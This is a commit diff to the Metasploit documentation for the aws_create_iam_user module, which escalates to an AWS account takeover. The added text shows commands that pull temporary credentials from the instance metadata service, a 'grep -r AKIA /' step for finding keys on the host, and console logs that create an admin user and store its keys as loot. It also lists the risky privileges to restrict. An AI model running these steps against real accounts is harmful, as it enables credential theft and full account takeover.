Updated README

2016-12-07 11:22:47 -08:00 · 2016-12-07 11:22:47 -08:00 · ee0e5e8681
parent a9cb08a352
commit ee0e5e8681
1 changed files with 138 additions and 38 deletions
--- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md
+++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md
@ -4,11 +4,27 @@ aws_create_iam_user is a simple post module that can be used to take over AWS
 accounts. Sure, it is fun enough to take over a single host, but you can own all
 hosts in the account if you simply create an admin user.

+# Background
+
+## Instance Profiles
+
+An Instance Profile is an AWS construct that maps a role to a host (instance).
+Not all hosts have instance profiles and/or may have restricted privileges.
+AWS roles are composed of policies which specify API calls that the host is
+allowed to make.
+
 ## Privileges

 This module depends on administrators being lazy and not using the least
-privileges possible. Only on rare cases should instances have the following
-privileges.
+privileges possible. We often see instances assigned `*.*` roles that allow
+any user on the instance to make any API call including creating admin users.
+When this occours, a user with long lived credentials can be created and calls
+against the AWS API can be made from anywhere on the Internet. Once an account
+is taken over in this manner instances can be spun up, other users can be locked
+out, networks can be traversed, and many other dangeous things can happen.
+
+Only on rare cases should hosts have the following privileges, these should be
+restriced.

 * iam:CreateUser
 * iam:CreateGroup
@ -16,7 +32,52 @@ privileges.
 * iam:AddUserToGroup
 * iam:CreateAccessKey

-## Establish a foothold
+This module will attempt all API calls listed above in sequence. Account takeover
+may succeed even if intermediate API calls fail. E.g., we may not be able to
+create a new user, but we may be able to create access keys for an existing user.
+
+## Metadata Service
+
+The metadata service is a mechanism the AWS hypervisor employs to pass
+information down into hosts. Any AWS host can retrieve information about itself
+and its environemtn by curling http://169.254.169.254/. This mechanism is also
+used to pass temporary credentials to a host. This module pulls these temporary
+credentials and attempts to create a user with admin privileges.
+
+To manually check that a host has an instance profile you can simply curl the
+metadata service like so:
+
+```
+$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
+SOME_ROLE_NAME
+$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/SOME_ROLE_NAME
+{
+  "Code" : "Success",
+  "LastUpdated" : "2016-12-07T18:36:48Z",
+  "Type" : "AWS-HMAC",
+  "AccessKeyId" : "ASIA
+  ...
+```
+
+# Usage
+
+aws_create_iam_user can be used to take over an AWS account given access to
+a host having 1). overly permissive instance profile/role, 2). API Access keys.
+Once a foothold is established, you can run the module to pull temporary
+access keys from the metadata service. If this fails, search the instance for
+API access keys, e.g., see ~/aws/credentals, and set `AccessKeyId`,
+`SecretAccessKey`, & `Token` (optional). 
+
+## Options
+
+* `IAM_USERNAME`: set this if you would like to control the username for to user to be created
+* `AccessKeyId`: set this if you find access keys on the host and instance has no profile/privileges
+* `SecretAccessKey`: set this if you find access keys on the host and instance has no profile/privileges
+* `Token`: set this if you find access keys on the host and instance has no profile/privileges. This is optional as this signifies temporary keys, if you find these, these are most likely expired.
+* `Proxies`: depending on your environment, you may wan to proxy your calls to AWS.
+
+
+### Establish a foothold

 You first need a foothold in AWS, e.g., here we use `sshexec` to get the
 foothold and launch a meterpreter session.
@ -59,10 +120,12 @@ Active sessions

 ```

-## Create IAM User
+## Overly Permissive Instance Profile

-Now you can load `aws_create_iam_user` and specify a meterpreter sesssion,
-e.g., `SESSION 1`.
+Here we are assuming that we have taken over a host having an instance profile with
+overly permissive access. Once a session is established, we can load
+`aws_create_iam_user` and specify a meterpreter sesssion,
+e.g., `SESSION 1` and run the exploit.

 ```
 msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
@ -70,42 +133,79 @@ msf post(aws_create_iam_user) > set SESSION 1
 SESSION => 1
 msf post(aws_create_iam_user) > exploit

-[*] 169.254.169.254:80 - looking for creds...
-[*] Creating user: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] Path: /
-[!] UserName: metasploit
-[!] Arn: arn:aws:iam::097986286576:user/metasploit
-[!] UserId: AIDA...
-[!] CreateDate: 2016-11-21T17:59:50.010Z
-[*] Creating group: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] Path: /
-[!] GroupName: metasploit
-[!] Arn: arn:aws:iam::097986286576:group/metasploit
-[!] GroupId: AGPAIENI6YTM5JVRQ2452
-[!] CreateDate: 2016-11-21T17:59:50.554Z
-[*] Creating group policy: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
-[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
-[*] Adding user (metasploit) to group: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
-[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
-[*] Creating API Keys for metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] AccessKeyId: AKIA...
-[!] SecretAccessKey: THE SECRET ACCESS KEY...
-[!] AccessKeySelector: HMAC
-[!] UserName: metasploit
-[!] Status: Active
-[!] CreateDate: 2016-11-21T17:59:51.967Z
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group policy: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Adding user (J2XXox11WW4brAcb) to group: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating API Keys for J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
 [+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
 [*] Post module execution completed
-msf post(aws_create_iam_user) > exit -y
 ```

+If the host does not have an instance profile or the right access, the output will look like so:
+
+```
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::097986286576:user/3SFFML3ucP1AyP7J
+[*] Creating group: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateGroup on resource: arn:aws:iam::097986286576:group/3SFFML3ucP1AyP7J
+[*] Creating group policy: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:PutGroupPolicy on resource: group 3SFFML3ucP1AyP7J
+[*] Adding user (3SFFML3ucP1AyP7J) to group: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:AddUserToGroup on resource: group 3SFFML3ucP1AyP7J
+[*] Creating API Keys for 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateAccessKey on resource: user 3SFFML3ucP1AyP7J
+[*] Post module execution completed
+```
+
+## API Access Keys
+
+In the case that the host we have taken over has no instance profile or does not
+have the required privileges, we can search the host for access keys with
+something like `grep -r AKIA /`. These keys may have admin privileges at which
+point you own the account, if not we may be able to escalate privileges.
+We can set `AccessKeyId`, `SecretAccessKey`, & `Token` (optional) and rerun
+the exploit to test this possibility.
+
+```
+msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
+msf post(aws_create_iam_user) > set AccessKeyId AKIAAKIAAKIAAKIAAKIA
+AccessKeyId => AKIAAKIAAKIAAKIAAKIA
+msf post(aws_create_iam_user) > set SecretAccessKey jhsdlfjkhalkjdfhalskdhfjalsjkakhksdfhlah
+SecretAccessKey => jhsdlfjkhalkjdfhalskdhfjalsjkakhksdfhlah
+msf post(aws_create_iam_user) > set SESSION 1
+SESSION => 1
+msf post(aws_create_iam_user) > run
+
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group policy: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Adding user (NyTDbU9v6LzzCLXq) to group: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating API Keys for NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
+[*] Post module execution completed
+```
+
+## Loot
+
 You can see the API keys stored in loot:

 ```